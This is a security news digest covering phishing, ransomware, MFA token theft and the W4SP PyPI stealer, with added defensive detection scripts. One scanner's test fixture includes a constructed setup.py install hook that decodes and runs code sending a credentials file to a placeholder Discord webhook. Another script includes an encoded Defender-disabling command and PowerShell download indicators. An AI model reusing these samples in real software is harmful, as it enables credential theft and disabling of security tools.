November 18, 2022

Fortify Security Team
Nov 18, 2022

Title: Phishing Kit Impersonates Well-Known Brands to Target US Shoppers
Date Published: November 17, 2022

Excerpt: “A sophisticated phishing kit has been targeting North Americans since mid-September, using lures focused on holidays like Labor Day and Halloween. The kit uses multiple detection evasion techniques and incorporates several mechanisms to keep non-victims away from its phishing pages. According to Akamai, whose security researchers discovered the campaign, one of the most interesting features of the kit is a token-based system that ensures each victim is redirected to a unique phishing page URL. The campaign spotted by Akamai started in September 2022 and continued throughout October, preying on online shoppers looking for “holiday specials.” The central theme of the phishing emails sent to prospective victims is a chance to win a prize from a reputable brand. The links in the email don’t raise any alarms as they lead to the phishing site after a series of redirections, while URL shorteners conceal most URLs.”

Title: Hive Ransomware Extorted Over $100M in Ransom Payments From Over 1,300 Companies
Date Published: November 18, 2022

Excerpt: “Hive ransomware operators have extorted over $100 million in ransom payments from over 1,300 companies worldwide as of November 2022. The threat actors behind the Hive ransomware-as-a-service (RaaS) have extorted $100 million in ransom payments from over 1,300 companies worldwide as of November 2022, reported the U.S. cybersecurity and intelligence authorities. “As of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom payments” reads the alert published by CISA. The authorities reported that from June 2021 through at least November 2022, threat actors employed the Hive ransomware in attacks aimed at a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). The Hive ransomware operation has been active since June 2021; it provides Ransomware-as-a-Service Hive and adopts a double-extortion model threatening to publish data stolen from the victims on their leak site (HiveLeaks). In April 2021, the Federal Bureau of Investigation (FBI) released a flash alert on the Hive ransomware attacks that includes technical details and indicators of compromise associated with the operations of the gang. According to a report published by blockchain analytics company Chainalysis, the Hive ransomware is one of the top 10 ransomware strains by revenue in 2021. The group used various attack methods, including malspam campaigns, vulnerable RDP servers, and compromised VPN credentials.”

Title: Microsoft: Hackers Are Using This ‘Concerning’ Tactic to Dodge Multi-Factor Authentication
Date Published: November 18, 2022

Excerpt: “Microsoft says token theft attacks are on the rise. Here’s what you need to do to protect yourself. Microsoft has outlined several mitigations to protect against attacks on multi-factor authentication that will unfortunately make life more difficult for your remote workers. Three years ago, attacks on multi-factor authentication (MFA) were so rare that Microsoft didn’t have decent statistics on them, largely because few organizations had enabled MFA. But with MFA use rising as attacks on passwords become more common, Microsoft has seen an increase in attackers using token theft in their attempts to sidestep MFA. In these attacks, the attacker compromises a token issued to someone who’s already completed MFA and replays that token to gain access from a different device. Tokens are central to OAuth 2.0 identity platforms, including Azure Active Directory (AD), which aim to make authentication simpler and faster for users, but in a way that’s still resilient to password attacks.”
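The replay described above leaves a trace in sign-in telemetry: a session established after MFA on one device shows up again from another device or IP address without a fresh MFA prompt. The script below is an added example (not Microsoft's code and not from the original post) that flags that pattern. The record shape is an assumption modelled loosely on Azure AD sign-in log fields, and the records themselves are constructed.

```python
"""Spot session-token replay in sign-in telemetry.

Added example, not Microsoft's code. A session ID here stands in for the
lineage of a token issued after MFA; when that same session is later used
from a different device or IP without a fresh MFA, the token has most likely
been copied off the original device and replayed. The record shape is an
assumption modelled loosely on Azure AD sign-in log fields, and the records
below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry).
SIGN_INS = [
    {"time": "2022-11-17T09:00:00", "user": "alice", "sessionId": "s-1",
     "deviceId": "dev-alice-laptop", "ip": "203.0.113.10", "mfa": True},
    {"time": "2022-11-17T09:20:00", "user": "alice", "sessionId": "s-1",
     "deviceId": "dev-alice-laptop", "ip": "203.0.113.10", "mfa": False},
    # Same session reappears from an unregistered device and a new IP,
    # and no MFA prompt was completed: the replay signature.
    {"time": "2022-11-17T09:35:00", "user": "alice", "sessionId": "s-1",
     "deviceId": "", "ip": "198.51.100.77", "mfa": False},
    {"time": "2022-11-17T10:00:00", "user": "bob", "sessionId": "s-2",
     "deviceId": "dev-bob-phone", "ip": "203.0.113.22", "mfa": True},
    {"time": "2022-11-17T11:00:00", "user": "bob", "sessionId": "s-2",
     "deviceId": "dev-bob-phone", "ip": "203.0.113.22", "mfa": False},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_token_replay(records, window=timedelta(hours=24)):
    """Return one alert per sign-in that reuses a session from elsewhere.

    The first sign-in seen for a session is taken as its origin. Any later
    sign-in on the same session that comes from a different device ID or IP,
    within `window` of the origin, and without MFA being re-performed, is
    reported. An empty device ID (unregistered device) counts as different.
    """
    by_session = defaultdict(list)
    for rec in sorted(records, key=lambda r: r["time"]):
        by_session[rec["sessionId"]].append(rec)

    alerts = []
    for session_id, events in by_session.items():
        origin = events[0]
        for event in events[1:]:
            moved = (event["deviceId"] != origin["deviceId"]
                     or event["ip"] != origin["ip"])
            within_window = _ts(event["time"]) - _ts(origin["time"]) <= window
            if moved and within_window and not event["mfa"]:
                alerts.append({
                    "user": event["user"],
                    "sessionId": session_id,
                    "origin_device": origin["deviceId"],
                    "origin_ip": origin["ip"],
                    "replay_device": event["deviceId"] or "<unregistered>",
                    "replay_ip": event["ip"],
                    "time": event["time"],
                })
    return alerts


if __name__ == "__main__":
    for alert in find_token_replay(SIGN_INS):
        print(alert)
```

An IP change on its own is noisy for mobile users, so in production the device-ID mismatch should carry most of the weight and the IP check be tuned by ASN or country. Detection is the backstop; the fix is policy that stops a stolen token from being useful off its original device.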

Title: Netflix Phishing Emails Surge 78%
Date Published: November 18, 2022

Excerpt: “Security researchers are warning that corporate accounts could be at risk after noting a 78% increase in email impersonation attacks spoofing the Netflix brand since October. If employees use the same credentials for personal accounts like Netflix as their work accounts, campaigns like this may imperil corporate systems and data, warned Egress. The group behind this particular campaign is using Unicode characters to bypass natural language processing (NLP) scanning in traditional anti-phishing filters, the security vendor claimed. “Unicode helps to convert international languages within browsers – but it can also be used for visual spoofing by exploiting international language characters to make a fake URL look legitimate,” Egress wrote. “For example, you could register a phishing domain as ‘xn–,’ which would be translated by a browser to ‘?’ This is known as a homograph attack.” Unicode is also used in the sender display names, such as “Netflix” and “help desk.” However, the threat actors didn’t stop there. “Other obfuscation techniques include trying to break up the text with non-identifiable characters, white on white text, and using characters from different languages to break the NLP’s perception as much as possible,” the vendor continued. “For example, using two V characters next to one another will be read as two Vs by a machine. But to a person skim-reading, VV looks a lot like W.” Alongside these techniques, the phishers use classic social engineering tactics, such as rushing the user into action and piggy-backing on current events – in this case Netflix’s introduction of a new ad-tier package.”
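The tricks listed above (punycode hosts, look-alike letters, zero-width characters, VV for W) all aim at the gap between what a filter reads and what a person sees. The script below is an added example, not Egress's tooling and not from the original post: it folds a display name, subject or host name down to the ASCII a skim-reader would perceive, then matches brands against that. The confusables table is an assumed subset of the Unicode confusables list, and the brand list and sample strings are constructed.

```python
"""Normalise homograph and NLP-evasion tricks before brand matching.

Added example, not Egress's tooling. Punycode (xn--) labels are decoded,
compatibility forms such as fullwidth letters are NFKC-normalised,
zero-width and combining characters are dropped, a small hand-picked table
of look-alike letters is mapped back to Latin, and two-letter look-alikes
(VV for W, rn for m) are collapsed. The confusables table is an assumed
subset, not the full Unicode list; brands and samples are constructed.
"""
import unicodedata

BRANDS = ["netflix", "instagram", "paypal"]

# Single-character look-alikes (assumed subset; the real list is far longer).
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0440": "p",  # Cyrillic small er
    "\u0441": "c",  # Cyrillic small es
    "\u0443": "y",  # Cyrillic small u
    "\u0445": "x",  # Cyrillic small ha
    "\u0456": "i",  # Cyrillic small byelorussian-ukrainian i
    "\u04cf": "l",  # Cyrillic small palochka
    "\u0131": "i",  # Latin dotless i
    "\u03bf": "o",  # Greek small omicron
}

# Letter pairs that a skim-reading eye merges into one letter.
MULTI_CONFUSABLES = [("vv", "w"), ("rn", "m")]


def decode_idna_labels(host):
    """Turn xn-- labels back into the Unicode a browser would display."""
    labels = []
    for label in host.split("."):
        if label.lower().startswith("xn--"):
            try:
                label = label[4:].encode("ascii").decode("punycode")
            except (UnicodeError, ValueError):
                pass  # leave an undecodable label untouched
        labels.append(label)
    return ".".join(labels)


def skeleton(text):
    """Reduce text to the ASCII a human would perceive it as."""
    text = unicodedata.normalize("NFKC", text).lower()
    kept = []
    for ch in text:
        category = unicodedata.category(ch)
        if category == "Cf" or category.startswith("M"):
            continue  # zero-width/format characters and combining marks
        kept.append(CONFUSABLES.get(ch, ch))
    result = "".join(kept)
    for pair, single in MULTI_CONFUSABLES:
        result = result.replace(pair, single)
    return result


def spoofed_brand(text, brands=BRANDS):
    """Return which brand `text` impersonates and whether it needed tricks.

    'evasive' is True when the brand is only visible after normalisation,
    i.e. a plain substring filter would have missed it.
    """
    sk = skeleton(decode_idna_labels(text))
    plain = text.lower()
    for brand in brands:
        if skeleton(brand) in sk:
            return {"brand": brand, "evasive": brand not in plain}
    return None


if __name__ == "__main__":
    samples = [
        "Netflix Billing",
        "Net\u200bflix help desk",
        "Instagrarn",
        "\uff2e\uff45\uff54\uff46\uff4c\uff49\uff58",
        "xn--" + "n\u0435tflix".encode("punycode").decode("ascii") + ".com",
    ]
    for sample in samples:
        print(repr(sample), "->", spoofed_brand(sample))
```

Matching on the skeleton rather than the raw string is the whole point: a display name that reads as the brand only after normalisation is a stronger phishing signal than one that spells it plainly, because the obfuscation itself has no legitimate reason to be there.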

Title: Instagram Impersonators Target Thousands, Slipping by Microsoft’s Cybersecurity
Date Published: November 17, 2022

Excerpt: “The socially engineered campaign used a legitimate domain to send phishing emails to large swaths of university targets. Cyberattackers have targeted students at national educational institutions in the US with a sophisticated phishing campaign that impersonated Instagram. The unusual aspect of the gambit is that they used a valid domain in an effort to steal credentials, bypassing both Microsoft 365 and Exchange email protections in the process. The socially engineered attack, which has targeted nearly 22,000 mailboxes, used the personalized handles of Instagram users in messages informing would-be victims that there was an “unusual login” on their account, according to a blog post published on Nov. 17 by Armorblox Research Team. The login lure is nothing new for phishers. But attackers also sent the messages from a valid email domain, making it much harder for both users and email-scanning technology to flag messages as fraudulent, the researchers said.”

Title: Transportation Sector Targeted by Both Ransomware and APTs
Date Published: November 18, 2022

Excerpt: “Trellix released The Threat Report: Fall 2022 from its Advanced Research Center, which analyzes cybersecurity trends from the third quarter (Q3) of 2022. The report includes evidence of malicious activity linked to ransomware and nation-state backed advanced persistent threat (APT) actors. It examines malicious cyber activity including threats to email, the malicious use of legitimate third-party security tools, and more.
Q3 cybersecurity trends:

  • US ransomware activity leads the pack: In the US alone, ransomware activity increased 100% quarter over quarter in transportation and shipping. Globally, transportation was the second most active sector (following telecom). APTs were also detected in transportation more than in any other sector.
  • Germany saw the highest detections: Not only did Germany generate the most threat detections related to APT actors in Q3 (29% of observed activity), but they also had the most ransomware detections. Ransomware detections rose 32% in Germany in Q3 and generated 27% of global activity.
  • Emerging threat actors scaled: The China-linked threat actor, Mustang Panda, had the most detected threat indicators in Q3, followed by Russian-linked APT29 and Pakistan-linked APT36.
  • Ransomware evolved: Phobos, a ransomware sold as a complete kit in the cybercriminal underground, has avoided public reports until now. It accounted for 10% of global detected activity and was the second most used ransomware detected in the US. LockBit continued to be the most detected ransomware globally, generating 22% of detections.
  • Old vulnerabilities continued to prevail: Years-old vulnerabilities continue to be successful exploitation vectors. Trellix observed Microsoft Equation Editor vulnerabilities comprising CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802 to be the most exploited among malicious emails received by customers during Q3.
  • Malicious use of Cobalt Strike: Trellix saw Cobalt Strike used in 33% of observed global ransomware activity and in 18% of APT detections in Q3. Cobalt Strike, a legitimate third-party tool created to emulate attack scenarios to improve security operations, is a favorite tool of attackers who repurpose its capabilities for malicious intent.”

Title: Google Search Results Poisoned With Torrent Sites via Data Studio
Date Published: November 18, 2022

Excerpt: “Threat actors are abusing Google’s Looker Studio (formerly Google Data Studio) to boost search engine rankings for their illicit websites that promote spam, torrents, and pirated content. The SEO poisoning attack analyzed by BleepingComputer uses Google’s subdomain to lend credibility to malicious domains. BleepingComputer has come across several pages of Google search results flooded with links after a concerned reader reported seeing the erratic behavior to us. These links, rather than representing a legitimate Google Data Studio project, are minisites that host links to pirated content. For example, one such search result we clicked on directs users looking to “Download Terrifier 2 (2022)” to links that further redirect multiple times to ultimately land on a spammy website.”

Title: Ongoing Supply Chain Attack Targets Python Developers With WASP Stealer
Date Published: November 18, 2022

Excerpt: “A threat actor tracked as WASP is behind an ongoing supply chain attack targeting Python developers with the WASP Stealer. Checkmarx researchers uncovered an ongoing supply chain attack conducted by a threat actor they tracked as WASP that is targeting Python developers. The attackers are using Python packages to distribute a polymorphic malware called W4SP Stealer. The malicious code is able to steal the victim’s Discord accounts, passwords, crypto wallets, credit cards, and other sensitive data on the victim’s PC. Stolen data has been sent back to the attacker through a hard-coded Discord webhook address. The threat actor is offering the WASP stealer for $20 claiming it is undetectable and is heavily “protected by some awesome obfuscation.” The supply chain attacks seem to be financially motivated. Checkmarx investigation started from recent reports from Phylum and Check Point, which spotted tens of PyPI packages delivering the W4SP stealer to developers’ systems.”
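Two of the traits described above, a hard-coded Discord webhook for exfiltration and obfuscated code that runs at install time, can be looked for in a package before it is installed. The scanner below is an added example, not Checkmarx's, Phylum's or Check Point's tooling and not from the original post. The package it scans is a constructed stand-in with a placeholder webhook URL, and the indicator patterns are assumptions that catch this family of tricks rather than a complete signature set.

```python
"""Scan a Python package's source for stealer-style exfiltration and loaders.

Added example, not Checkmarx's tooling. It looks for a hard-coded Discord
webhook (also when hidden inside a base64 literal), exec() fed by a decoder,
and a setup.py install hook that runs code at `pip install` time. The package
below is constructed, the webhook URL is a placeholder, and the indicator
patterns are assumptions, not a complete signature set.
"""
import base64
import re

WEBHOOK_RE = re.compile(
    r"https?://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+"
)
# Long runs of base64 alphabet: candidates for an encoded second stage.
B64_LITERAL_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DECODER_HINTS = ("b64decode(", "marshal.loads(", "zlib.decompress(", "codecs.decode(")

# --- constructed sample package (placeholder webhook, nothing real) --------
_PAYLOAD_SRC = (
    'import requests\n'
    'requests.post("https://discord.com/api/webhooks/000000000000000000/'
    'EXAMPLE_placeholder_token", json={"content": open("creds.txt").read()})\n'
)
_PAYLOAD_B64 = base64.b64encode(_PAYLOAD_SRC.encode()).decode()

SAMPLE_PACKAGE = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import base64\n\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        f'        exec(base64.b64decode("{_PAYLOAD_B64}"))\n\n'
        'setup(name="colorfulprint", version="0.1", cmdclass={"install": PostInstall})\n'
    ),
    "colorfulprint/__init__.py": "def cprint(text):\n    print(text)\n",
}
# ---------------------------------------------------------------------------


def scan_source(path, text):
    """Return a list of {file, kind, detail} findings for one source file."""
    findings = []

    for match in WEBHOOK_RE.finditer(text):
        findings.append({"file": path, "kind": "discord_webhook", "detail": match.group(0)})

    # Decode base64-looking literals and rescan what comes out of them.
    for match in B64_LITERAL_RE.finditer(text):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        for inner in WEBHOOK_RE.finditer(decoded):
            findings.append({"file": path, "kind": "discord_webhook",
                             "detail": inner.group(0) + " (base64-encoded)"})
        if "exec(" in decoded or "import " in decoded:
            findings.append({"file": path, "kind": "encoded_code",
                             "detail": decoded.strip().splitlines()[0][:60]})

    if "exec(" in text and any(hint in text for hint in DECODER_HINTS):
        findings.append({"file": path, "kind": "exec_of_decoded_data",
                         "detail": "exec() called on decoder output"})

    if path.endswith("setup.py") and "cmdclass" in text and "install" in text:
        findings.append({"file": path, "kind": "install_hook",
                         "detail": "setup.py overrides the install command"})
    return findings


def scan_package(files):
    """Scan every file in a {path: source} mapping; return all findings."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_source(path, text))
    return findings


def is_suspicious(findings):
    """True when exfiltration is visible or install-time code execution is hidden."""
    kinds = {f["kind"] for f in findings}
    return "discord_webhook" in kinds or {"install_hook", "exec_of_decoded_data"} <= kinds


if __name__ == "__main__":
    results = scan_package(SAMPLE_PACKAGE)
    for finding in results:
        print(finding)
    print("suspicious:", is_suspicious(results))
```

Decoding base64 literals and rescanning the result is what makes the webhook visible here; a plain string search over the package would see only the encoded blob. Run against a downloaded sdist (`pip download --no-deps --no-binary :all: <pkg>`, then unpack) rather than an installed copy, since setup.py has already executed by install time.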

Title: Emerging Threat Actor DEV-0569 Expands Its Toolkit to Deliver Royal Ransomware
Date Published: November 18, 2022

Excerpt: “DEV-0569, a new threat actor whose activity can be traced back as early as August 2022, developed new tools to deliver the Royal ransomware, claimed Microsoft Security Threat Intelligence in a post published on November 17, 2022. This emerging group, for which Microsoft still uses a temporary ‘DEV-####’ designation, meaning they are unsure about its origin or identity, typically relies on malvertising and phishing link vectors. They point to a malware downloader called BATLOADER, posing as legitimate software installers such as TeamViewer, Adobe Flash Player and Zoom, or updates embedded in spam emails, fake forum pages, and blog comments to deploy the Royal ransomware, which first emerged in September 2022 and is being distributed by multiple threat actors. When launched, BATLOADER uses MSI Custom Actions to launch malicious PowerShell activity or run batch scripts to aid in disabling security solutions and lead to the delivery of various encrypted malware payloads that are decrypted and launched with PowerShell commands. From September 2022, Microsoft noticed that DEV-0569 started using contact forms to deliver its payloads. In one particular campaign, DEV-0569 sent a message to targets using the contact form on these targets’ websites, posing as a national financial authority. When a contacted target responds via email, DEV-0569 replies with a message that contains a link to BATLOADER. This method has been seen in other campaigns, including IcedID malware, notably used by the Emotet group. Microsoft also noticed that, from September, DEV-0569 started hosting fake installer files on legitimate-looking software download sites and legitimate repositories to make malicious downloads look authentic to targets, and an expansion of their malvertising technique by using Google Ads in regular campaigns, effectively blending in with normal ad traffic.”
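The chain described above, an MSI custom action launching PowerShell or a batch script that then disables security tooling, leaves a simple trace in process-creation telemetry: msiexec.exe as the parent of a script host. The detector below is an added example, not Microsoft's detection content and not from the original post. It checks for that parent/child pair, decodes a base64 -EncodedCommand (UTF-16LE) so the real command can be inspected, and raises severity when defence-evasion commands appear. The event shape is an assumption loosely following Sysmon event ID 1 field names, the indicator lists are a small assumed set, and the events are constructed.

```python
"""Flag script hosts spawned by the Windows Installer, decoding -EncodedCommand.

Added example, not Microsoft's detection content. Event field names are an
assumption loosely following Sysmon event ID 1; indicator lists are a small
assumed set; the events below are constructed.
"""
import base64
import ntpath
import re

INSTALLER_PARENTS = {"msiexec.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SUSPICIOUS_FLAGS = ("-nop", "-w hidden", "-windowstyle hidden", "bypass",
                    "-enc", "-encodedcommand", "invoke-expression",
                    "downloadstring", "net.webclient")
DEFENSE_EVASION = ("set-mppreference", "disablerealtimemonitoring",
                   "add-mppreference", "exclusionpath", "sc stop", "net stop",
                   "taskkill")
ENCODED_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Constructed sample: PowerShell's -EncodedCommand takes base64 of UTF-16LE.
_HIDDEN = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")
).decode("ascii")

EVENTS = [
    {"host": "ws01", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -ep bypass -enc {_HIDDEN}"},
    {"host": "ws01", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\setup_helper.bat"'},
    {"host": "ws02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"host": "ws02", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /V"},
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return an alert dict for an installer-spawned script host, else None."""
    parent = ntpath.basename(event["parent_image"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent not in INSTALLER_PARENTS or image not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(event["cmdline"])
    # Search the raw command line and the decoded payload together.
    haystack = (event["cmdline"] + " " + (decoded or "")).lower()
    flags = [f for f in SUSPICIOUS_FLAGS if f in haystack]
    evasion = [d for d in DEFENSE_EVASION if d in haystack]
    if evasion:
        severity = "high"
    elif flags or decoded:
        severity = "medium"
    else:
        severity = "low"
    return {"host": event["host"], "parent": parent, "child": image,
            "severity": severity, "flags": flags, "evasion": evasion,
            "decoded_command": decoded}


def analyze_all(events):
    """Run analyze() over a batch and keep only the hits."""
    return [alert for alert in map(analyze, events) if alert]


if __name__ == "__main__":
    for alert in analyze_all(EVENTS):
        print(alert)
```

Legitimate installers do spawn cmd.exe from custom actions, which is why a bare msiexec-to-cmd pair is scored low and the hidden-window, encoded-command and Defender-tampering indicators drive the severity. Decoding the encoded command before matching matters: without it the Set-MpPreference call in the first event is invisible to string rules.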

Title: Australia Unveils Plan to Counter Global Cybercrime Problem
Date Published: November 17, 2022

Excerpt: “Following a spate of cyberattacks and data breaches affecting millions of Australians, the government’s cybersecurity minister this week announced the formation of a task force that will hunt down hackers and said she is contemplating a ban on ransomware payments. Australia Cyber Security Minister Clare O’Neil announced the formation of the Joint Standing Operation task force, which brings together experts from the Australian Federal Police and the Australian Signals Directorate. The task force merges domestic police and foreign intelligence resources to provide assistance to victims and also to take down international cybercriminals. The Joint Standing Operation will “investigate, target and disrupt cybercriminal syndicates with a priority on ransomware threat groups,” according to a joint news release. On Saturday, O’Neil reiterated that this task force is a way of “Australia standing up and punching back.” “What they will do is scour the world and hunt down the criminal syndicates and gangs who are targeting Australia in cyberattacks and disrupt their efforts,” whether they’re in Russia or other countries, O’Neil announced on Twitter.”
